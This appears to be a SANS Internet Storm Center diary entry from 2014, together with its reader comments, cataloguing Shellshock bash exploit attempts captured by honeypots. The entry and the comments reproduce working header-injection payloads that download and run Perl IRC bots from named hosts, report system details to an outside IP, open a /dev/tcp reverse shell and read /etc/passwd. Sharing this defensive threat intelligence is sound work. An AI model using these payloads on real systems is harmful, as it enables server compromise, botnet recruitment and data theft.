Shellshock: A Collection of Exploits seen in the wild

Shellshock: A Collection of Exploits seen in the wild
Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far: 1 - Simple "vulnerability checks" that used custom User-Agents: () { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a; () { :;}; echo 'Shellshock: Vulnerable' () { :;};echo content-type:text/plain;echo;echo [random string];echo;exit () { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Co\ ntent-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi This one is a bit different. It includes the tested URL as user agent. But of course, it doesn't escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an "empty page" message. ) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22 2 - Bots using the shellshock vulnerability: This one installs a simple perl bot. Connects to irc.hacker-newbie.org port 6667 channel #bug () { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b\ 0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0\ b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http\ ://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh\ ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.\ com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:\ //xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22; 3 - Vulnerability checks using multiple headers: GET / HTTP/1.0 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 Accept: / Cookie: () { :; }; ping -c 3 [ipaddress] Host: () { :; }; ping -c 3 [ipaddress] Referer: () { :; }; ping -c 3 [ipaddress] 4 - Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case) GET / HTTP/1.1 Host: [ip address] Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl 5 - Using User-Agent to report system parameters back (the IP address is currently not responding) GET / HTTP/1.0 Accept: /\ aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3 Host: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)" Cookie: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)" 6 - User-Agent used to install perl box GET / HTTP/1.0 Host: [ip address] User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z* --- Johannes B. Ullrich, Ph.D. STI\|Twitter\|LinkedIn I will be teaching next: Intrusion Detection In-Depth - SANS Baltimore Spring 2020	Johannes 3798 Posts ISC Handler
Subscribe	Sep 29th 2014 5 years ago
I've seen the 0v3r1d3 one, as well as one that looks like: () { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\" The document at that URL claims it another security research company. I also got another that actually delivers a directly malicious payload: () { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\"	Ryan 2 Posts
Quote	Sep 29th 2014 5 years ago
"legend.txt" looks like an IRC bot written in perl. Connects to chaos.legend.rocks port 7777. Currently about 100 bots in that channel.	Johannes 3798 Posts ISC Handler
Quote	Sep 29th 2014 5 years ago
There are also people attempting to create reverse shells - for example "USER-AGENT : () { :; }; /bin/bash -i >& /dev/tcp/[IP_ADDRESS]/80 0>&1".	Anonymous
Quote	Sep 29th 2014 5 years ago
66.150.114.30 -- "GET /test HTTP/1.0" 404 368 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" This is the one I'm seeing show up. It's actually the first one I saw.	Zach W 10 Posts
Quote	Sep 29th 2014 5 years ago
We've seen about 1000 attempts from a pair of IP addresses with the following; User-Agent: () { :; }; "exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')";	Max 1 Posts
Quote	Sep 30th 2014 5 years ago
Pulled quite a list of perlbot installation attempts out of my web logs. Sent abuse mails to the providers hosting the C&C IRC servers configured in the perl files. Also got the bash-count.txt hit. I wonder what good that scan is.. I guess most admins who find that line in their logs will wget the file manually, and end up as a false positive on the research database.	Visi 41 Posts
Quote	Sep 30th 2014 5 years ago
These sample exploits lead me to want to remind everyone of the importance of proper Egress filtering. At least the ones that rely on running 'wget' or 'curl' as the Apache/web server user would not work on my main web server, assuming bash had not been patched :)	Mysid 146 Posts
Quote	Sep 30th 2014 5 years ago
I've been caught by number 6 - User-Agent used to install perl box On attempting to pull down the file onto an isolated test machine, all I get is a html welcome page, so I guess that the original exploit has been removed. Can anyone give me more details as to what the original script did so that I can evaluate the damage while we rebuild the system? Thanks, Alex	Mysid 1 Posts
Quote	Sep 30th 2014 5 years ago
() { :;}; /bin/bash -c "/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm Appears to be a bot that is trying to look like google analytics.	Mysid 1 Posts
Quote	Oct 2nd 2014 5 years ago
One of my virtual servers got attacked with that perl box installation: access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 358 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\"" access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET / HTTP/1.0" 200 1 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\"" access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /test HTTP/1.0" 404 347 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" Every time right after rebooting the server netstat displayed a bot connection in port 25: vps-1044161-3266:/etc# netstat -nap Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name . . . tcp 0 0 168.144.XX.XX:25 92.87.210.196:57180 TIME_WAIT - The destination address varied from reboot to another. I made a test and removed postfix installation the server. After removing postfix I cann't detect any botnet connection on port 25. Unfortunately the post fix is gone, so I'm not able to analyze the postfix binaries any further. But I suggest that ec.z changed the postfix binaries.	Mysid 1 Posts
Quote	Oct 2nd 2014 5 years ago
We're still seeing these attacks (from specific IPs - despite complaints to their ISP) They are targeting specific (Perl) files, using this sort of code: () { (a)=>\\' bash -c 'echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit () { (a)=>\\' bash -c 'echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit () { (a)=>\\' bash -c 'echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit () { (a)=>\\' bash -c 'echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit () { (a)=>\\' bash -c 'echo;echo \"d2d0\"'e609'd40dabb802ef23ef2ade2ba3;echo;exit () { :;};echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit () { :;};echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit () { :;};echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit () { :;};echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit in the referrer and cookie fields. I've not been able to find these in any other exploit posts. I have seen the attempts in a few other google-able logs though. Any idea what they're trying to do?	afbach 5 Posts
Quote	Oct 13th 2014 5 years ago

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 - Simple "vulnerability checks" that used custom User-Agents:

() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
() { :;}; echo 'Shellshock: Vulnerable'
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Co\
ntent-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn't escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an "empty page" message.

) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22

2 - Bots using the shellshock vulnerability:

This one installs a simple perl bot. Connects to irc.hacker-newbie.org port 6667 channel #bug

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b\
0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0\
b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http\
://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh\
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.\
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:\
//xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;

3 - Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 - Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

5 - Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*\
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"
Cookie: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"

6 - User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

I will be teaching next: Intrusion Detection In-Depth - SANS Baltimore Spring 2020

Johannes

3798 Posts
ISC Handler

I've seen the 0v3r1d3 one, as well as one that looks like:

() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"

The document at that URL claims it another security research company.

I also got another that actually delivers a directly malicious payload:

() { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\"

Ryan

2 Posts

"legend.txt" looks like an IRC bot written in perl. Connects to chaos.legend.rocks port 7777. Currently about 100 bots in that channel.

Johannes

3798 Posts
ISC Handler

There are also people attempting to create reverse shells - for example "USER-AGENT : () { :; }; /bin/bash -i >& /dev/tcp/[IP_ADDRESS]/80 0>&1".

Anonymous

66.150.114.30 -- "GET /test HTTP/1.0" 404 368 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""

This is the one I'm seeing show up. It's actually the first one I saw.

Zach W

10 Posts

We've seen about 1000 attempts from a pair of IP addresses with the following;

User-Agent: () { :; }; "exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')";

Max

1 Posts

Pulled quite a list of perlbot installation attempts out of my web logs.
Sent abuse mails to the providers hosting the C&C IRC servers configured in the perl files.

Also got the bash-count.txt hit. I wonder what good that scan is.. I guess most admins who find that line in their logs will wget the file manually, and end up as a false positive on the research database.

Visi

41 Posts

These sample exploits lead me to want to remind everyone of the importance of proper Egress filtering.

At least the ones that rely on running 'wget' or 'curl' as the Apache/web server user would not work on my main web server, assuming bash had not been patched :)

Mysid

146 Posts

I've been caught by number 6 - User-Agent used to install perl box

On attempting to pull down the file onto an isolated test machine, all I get is a html welcome page, so I guess that the original exploit has been removed.

Can anyone give me more details as to what the original script did so that I can evaluate the damage while we rebuild the system?

Thanks, Alex

Mysid
1 Posts

() { :;}; /bin/bash -c "/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm

Appears to be a bot that is trying to look like google analytics.

Mysid
1 Posts

One of my virtual servers got attacked with that perl box installation:

access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 358 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET / HTTP/1.0" 200 1 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /test HTTP/1.0" 404 347 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""

Every time right after rebooting the server netstat displayed a bot connection in port 25:

vps-1044161-3266:/etc# netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
.
.
.
tcp 0 0 168.144.XX.XX:25 92.87.210.196:57180 TIME_WAIT -

The destination address varied from reboot to another.

I made a test and removed postfix installation the server. After removing postfix I cann't detect any botnet connection on port 25. Unfortunately the post fix is gone, so I'm not able to analyze the postfix binaries any further. But I suggest that ec.z changed the postfix binaries.

Mysid
1 Posts

We're still seeing these attacks (from specific IPs - despite complaints to their ISP) They are targeting specific (Perl) files, using this sort of code:

() { (a)=>\\' bash -c 'echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"d2d0\"'e609'd40dabb802ef23ef2ade2ba3;echo;exit
() { :;};echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit
() { :;};echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit
() { :;};echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit
() { :;};echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit

in the referrer and cookie fields. I've not been able to find these in any other exploit posts. I have seen the attempts in a few other google-able logs though. Any idea what they're trying to do?

afbach

5 Posts